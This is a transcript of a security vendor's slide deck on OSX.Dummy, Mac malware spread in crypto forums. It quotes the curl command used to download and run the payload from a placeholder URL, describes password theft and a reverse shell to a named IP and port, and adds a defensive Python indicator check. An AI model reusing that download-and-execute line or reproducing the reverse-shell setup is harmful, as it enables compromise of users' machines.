OSX.Dummy: Mac Malware Targets Crypto-Community Forums - PowerPoint PPT Presentation

About This Presentation

Title: OSX.Dummy: Mac Malware Targets Crypto-Community Forums

Slides: 10
Provided by: phishingsolutions

Transcript and Presenter's Notes


1
OSX.Dummy: Mac Malware Targets Crypto-Community Forums
Attackers posing as admins are asking users of crypto-community channels on Slack and Discord to infect themselves with malware through simple, and rather dumb, social engineering tactics. Mac researchers agreed on naming the malware OSX.Dummy, for a reason.
www.izoologic.com
2
The following command was shared to unsuspecting crypto forums:
"cd /tmp && curl -s curl MALICIOUS_URL > script && chmod +x script && ./script"
If this obviously sketchy line managed to trick someone into typing it into a terminal, a hefty 34 MB malicious binary was downloaded and executed.
3
The rather massive size is explained by the many OpenSSL and V8 libraries that appear to be compiled into the binary.
4
What happens next? First, the malware requests root permissions for the malicious script, so the victim is required to enter their password in the terminal. The malware then saves that password to "/tmp/dumpdummy".
5
Once it has root on the victim's machine, it creates a reverse shell script file and installs a persistent daemon so the shell keeps running. Basically, a reverse shell is a technique in which the victim's machine connects back to the attacker, handing over admin access and giving the two a stable connection.
6
In this case, the malicious reverse shell script is written in Python and opens a reverse shell connection to 185.243.115.230 on port 1337. If this succeeds, the attacker can easily control the victim's PC (with root access) and execute admin commands.
7
As OSX.Dummy is only shared within crypto-community forums, one can deduce that its makers intended to steal cryptocurrency. Negating this malware altogether, though, is as simple (but effective) as blocking 185.243.115.230, the IP address the shell script communicates with.
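A defender-side check for the indicators the slides give (the reverse shell to 185.243.115.230 on port 1337 and the /tmp/dumpdummy password file), as an added Python example that is not part of the original presentation: it parses constructed macOS `netstat -an` output, flags rows whose peer is the C2 address, and checks a list of paths for the password dump.

```python
import re

# Indicators taken from the slides above; the sample output below is
# constructed for this example and is not a real capture.
C2_IP = "185.243.115.230"
C2_PORT = 1337
PASSWORD_DUMP = "/tmp/dumpdummy"

# macOS `netstat -an` prints peers as IP.PORT (e.g. 185.243.115.230.1337),
# so the last dotted field is the port, not a fifth octet.
_PEER_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\.(\d+)$")


def parse_netstat_line(line):
    """Return (peer_ip, peer_port, state) for a TCP row, else None."""
    fields = line.split()
    if len(fields) < 6 or not fields[0].startswith("tcp"):
        return None  # header, blank, UDP or listening-socket rows
    m = _PEER_RE.match(fields[4])
    return (m.group(1), int(m.group(2)), fields[5]) if m else None


def find_c2_connections(netstat_output):
    """Rows whose peer is the C2 address; matching on the IP alone mirrors
    the slides' mitigation (block the address) and notes if the port is 1337."""
    hits = []
    for line in netstat_output.splitlines():
        parsed = parse_netstat_line(line)
        if parsed and parsed[0] == C2_IP:
            ip, port, state = parsed
            hits.append({"port": port, "state": state,
                         "expected_port": port == C2_PORT})
    return hits


def find_password_dump(paths):
    """Flag the file the malware writes the victim's sudo password to."""
    return [p for p in paths if p == PASSWORD_DUMP]


# Constructed sample resembling `netstat -an` on macOS (not real data).
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  192.168.1.20.52114     203.0.113.5.443        ESTABLISHED
tcp4       0      0  192.168.1.20.52230     185.243.115.230.1337   ESTABLISHED
tcp4       0      0  127.0.0.1.631          *.*                    LISTEN
udp4       0      0  *.5353                 *.*
"""
```

On a live host the same functions can be fed the output of `netstat -an` and a listing of `/tmp`; a hit on the address in any TCP state is worth investigating even if the port differs.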
8
Level 1, 444 Castro Street, Mountain View, California, USA
www.izoologic.com
1 650 396 3352
sales_at_izoologic.com